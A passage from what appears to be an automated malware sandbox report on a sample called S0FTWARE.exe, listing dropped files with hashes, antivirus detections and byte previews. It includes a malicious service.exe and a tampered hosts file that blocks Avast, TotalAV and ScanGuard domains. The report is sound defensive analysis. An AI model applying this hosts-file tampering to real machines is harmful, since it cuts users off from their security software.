                                                                                                                                                                                                                                                                                                                                                        SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 14 13:26:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2677
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.9706953632313344
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8pd3TvjbH7idAKZdA19ehwiZUklqehry+3:8rXpky
                                                                                                                                                                                                                                                                                                                                                        MD5:3150DD92D02311F72B5C6B0B0E879B48
                                                                                                                                                                                                                                                                                                                                                        SHA1:DBA47DA3ACF274AA4F0DEA87D57F0A7A2815F26F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:353F0BA9FAF98B60BEF9863976053681F7D2AFA125575EC378BCAF3C09C79C44
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F04BD25B7B9436DEED7B0E41BCF22F7E6F63D0560912022D6C6C1DCA9390220CA9B0CCDD09646DC9092D65A0275D6849A66E51D9557F1A8DE5EA4E4FE7FE57B6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....4#.6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.InY@s....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnY@s....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnY@s....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnY@s..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnYBs...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............y.-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 14 13:26:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2679
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.9867823287416906
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8Dd3TvjbH7idAKZdA1weh/iZUkAQkqehUy+2:89X79Qpy
                                                                                                                                                                                                                                                                                                                                                        MD5:1AB8A390B96A2265D9D003F5174E85FF
                                                                                                                                                                                                                                                                                                                                                        SHA1:D47F29FC1539BCD55312119E85F8A7372FD8ED05
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B0C8D1DF0703B9BF6283EA5C825FFE61B45271FE9358B1675359211F3150752B
                                                                                                                                                                                                                                                                                                                                                        SHA-512:10DFE7745532C0D85D1B5351DEF42FC6BA6E48309784E702836541DA32B14B37EDEC2D776DDC129E632EB13AAA189503EC8B8BD6CFCFA18BE4F88C8E19CF4D11
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.......".6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.InY@s....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnY@s....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnY@s....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnY@s..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnYBs...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............y.-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2693
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.000053578817221
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8xcd3TvjsH7idAKZdA14tseh7sFiZUkmgqeh7siy+BX:8xcXenoy
                                                                                                                                                                                                                                                                                                                                                        MD5:00D52FDD3563B4F45E14D663324C7A99
                                                                                                                                                                                                                                                                                                                                                        SHA1:610BF70F85412DA0B5CF0293C80449D8CFCB3185
                                                                                                                                                                                                                                                                                                                                                        SHA-256:575509A13E3E642DF2A55A527FA22DD5170EACFB2122F5CB796DC5C4C10F3351
                                                                                                                                                                                                                                                                                                                                                        SHA-512:373E02CB2EC579BBE2A5F2B7569680BB5AA551EA38CCA4C280DDA3E5571A564C8EC395390DD192B62ECC80C5D084119B6DEAC825808EC8268B346623214102D6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.InY@s....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnY@s....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnY@s....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnY@s..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............y.-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 14 13:26:03 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.9857193888091658
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8td3TvjbH7idAKZdA1vehDiZUkwqehgy+R:8XXYay
                                                                                                                                                                                                                                                                                                                                                        MD5:B26600AA44C5DD45F4033B76D1551E3C
                                                                                                                                                                                                                                                                                                                                                        SHA1:3518233C12D7E848E656E4716EB85EBC6275AFD8
                                                                                                                                                                                                                                                                                                                                                        SHA-256:3DE9C0FE8537E2912CB41E469FE87A8DC13BDF22F567F72304B9B1D41C4C02F3
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D33EDCD975233DFA148A0EEBDBC6AAA3FA8D51E112B19ED8B0D9CF14D9638660027F55A0BEBA12BF0B4D8542A8264BE7C64C6EA0EED10FE73DBCCEE25CB5C0E6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.......".6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.InY@s....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnY@s....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnY@s....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnY@s..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnYBs...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............y.-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 14 13:26:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.975664588991513
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8id3TvjbH7idAKZdA1hehBiZUk1W1qehmy+C:8yXI9Gy
                                                                                                                                                                                                                                                                                                                                                        MD5:634ECFE3F76482430E3E7624B5A43AEB
                                                                                                                                                                                                                                                                                                                                                        SHA1:0DE0B1487D4D5D3D79EBC9B09FDAD916D612FBE4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:3B2E2E62666177D289750DF3A8D1074D1FAB10D46F88BB8CCBD96AC190FEC612
                                                                                                                                                                                                                                                                                                                                                        SHA-512:5561C3C2672A840E277D13C87C5D3013291DA79094717D087E9E480EDAC1D8DC7F4407BDAC4FE5E3FA27E9A86C85E62F6A8FAD41AA951E5B036F4FF45B5A57C4
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....^..".6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.InY@s....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnY@s....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnY@s....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnY@s..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnYBs...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............y.-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 14 13:26:03 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2683
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.984180189881607
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8Cd3TvjbH7idAKZdA1duT+ehOuTbbiZUk5OjqehOuTboy+yT+:8SXmT/TbxWOvTboy7T
                                                                                                                                                                                                                                                                                                                                                        MD5:90BBBEE8D59E82D19324AF38E6CBD254
                                                                                                                                                                                                                                                                                                                                                        SHA1:76B24BA26F6093C06D146E0F6EA22DC7883E3E09
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6F571CE6D67F26AF8E5E180985B003EADBE94F0B80A8FF30D170A62F2A388CFF
                                                                                                                                                                                                                                                                                                                                                        SHA-512:9A68123BE4F01724DCF12407A392949713D7F6849937A44D40821CF1E4D053F0797A49DAE094462A4A6F99A1854E2F245E4FC1F7FAC727D223B06E6004D61EB2
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......V".6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.InY@s....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnY@s....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnY@s....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnY@s..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnYBs...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............y.-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\service.exe

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\ProgramData\GHDAKKJJJK.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5842928
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.890789729742247
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:kYq0KmyfpgVBH9rqADdgnILbQaPhgPqt0nw9pdfvBNTHuzD8vxFJN+L24Kc:tUpg3drqMSILbQAWPqt04phBNTOEvhIh
                                                                                                                                                                                                                                                                                                                                                        MD5:18F4B337AD6BEB8E7EE040BCC8C049DF
                                                                                                                                                                                                                                                                                                                                                        SHA1:641350458E08F2275A451239DC74A2F7681ADF4F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:9B3607E5A2407E4A2875EA68340CF1724853031A39DD7FAA47A97C83B1B1F5E3
                                                                                                                                                                                                                                                                                                                                                        SHA-512:68AD53F8F42B9DB45F080D5DC467E4A4A01B3DDC4D7F816A31C10C720D0B92A2F57F028E82614CCF7FF04D2CBEB0F9F0355D89E70380319A549CC926E8596AAA
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..f.................F..........o0M......`....@.................................E.Y....... ..............................t......P..$.............Y......................................|@......................P-.4............................text...TE..........................`.P`.data...(....`......................@.0..rdata..0....p......................@.0@.eh_fram@...........................@.0@.bss....p.............................0..idata..............................@.0..CRT................................@.0..tls.... ...........................@.0..vmp.$..l,......................... ..`.vmp.$......P-.....................@....vmp.$...X..`-...X................. ..`.rsrc...$....P........X.............@..@................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\0X1.9B5680P-1008PPDATA\service.exe (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\service.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5842928
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.890789729742247
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:kYq0KmyfpgVBH9rqADdgnILbQaPhgPqt0nw9pdfvBNTHuzD8vxFJN+L24Kc:tUpg3drqMSILbQAWPqt04phBNTOEvhIh
                                                                                                                                                                                                                                                                                                                                                        MD5:18F4B337AD6BEB8E7EE040BCC8C049DF
                                                                                                                                                                                                                                                                                                                                                        SHA1:641350458E08F2275A451239DC74A2F7681ADF4F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:9B3607E5A2407E4A2875EA68340CF1724853031A39DD7FAA47A97C83B1B1F5E3
                                                                                                                                                                                                                                                                                                                                                        SHA-512:68AD53F8F42B9DB45F080D5DC467E4A4A01B3DDC4D7F816A31C10C720D0B92A2F57F028E82614CCF7FF04D2CBEB0F9F0355D89E70380319A549CC926E8596AAA
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..f.................F..........o0M......`....@.................................E.Y....... ..............................t......P..$.............Y......................................|@......................P-.4............................text...TE..........................`.P`.data...(....`......................@.0..rdata..0....p......................@.0@.eh_fram@...........................@.0@.bss....p.............................0..idata..............................@.0..CRT................................@.0..tls.... ...........................@.0..vmp.$..l,......................... ..`.vmp.$......P-.....................@....vmp.$...X..`-...X................. ..`.rsrc...$....P........X.............@..@................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\drivers\etc\hosts

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\ProgramData\AAFIJKKEHJ.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2748
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.269302338623222
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
                                                                                                                                                                                                                                                                                                                                                        MD5:7B1D6A1E1228728A16B66C3714AA9A23
                                                                                                                                                                                                                                                                                                                                                        SHA1:8B59677A3560777593B1FA7D67465BBD7B3BC548
                                                                                                                                                                                                                                                                                                                                                        SHA-256:3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
                                                                                                                                                                                                                                                                                                                                                        SHA-512:573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..

                                                                                                                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.40914782072564
                                                                                                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                                                                        File name:S0FTWARE.exe
                                                                                                                                                                                                                                                                                                                                                        File size:26'859'520 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5:bae4ccaa9aa2b36270938dde45d069be
                                                                                                                                                                                                                                                                                                                                                        SHA1:cb696fbf4fe475d7f101c74d30cc66d3145c9518
                                                                                                                                                                                                                                                                                                                                                        SHA256:e74b15c06a985bbe82864342a4d69e071fcc304f18bccc14848d8a8e21ce956f
                                                                                                                                                                                                                                                                                                                                                        SHA512:eb621a8f1681635bda3a7dce51c117850849bebe34168f9aa92426df623f5284ad5570fd2e1b629d43dc767ded269eb7c04360804939259807022d7b61b6b026
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:196608:7ZNOWAzUkdflDyh8N090he/9YgumJkc4iXMvqKXohDMvGCEY:C9VxY8N09keFYvDVv76Ty
                                                                                                                                                                                                                                                                                                                                                        TLSH:BA474A50FDEB42F1DA0358705597A27F63306E058B28CACBD600BF6AF87B6E10A77159
                                                                                                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................................... .........o...@.................................7,....@................................

                                                                                                                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                                                                                                                        Icon Hash:2d2e3797b32b2b99

                                                                                                                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Entrypoint:0x46da20
                                                                                                                                                                                                                                                                                                                                                        Entrypoint Section:.text
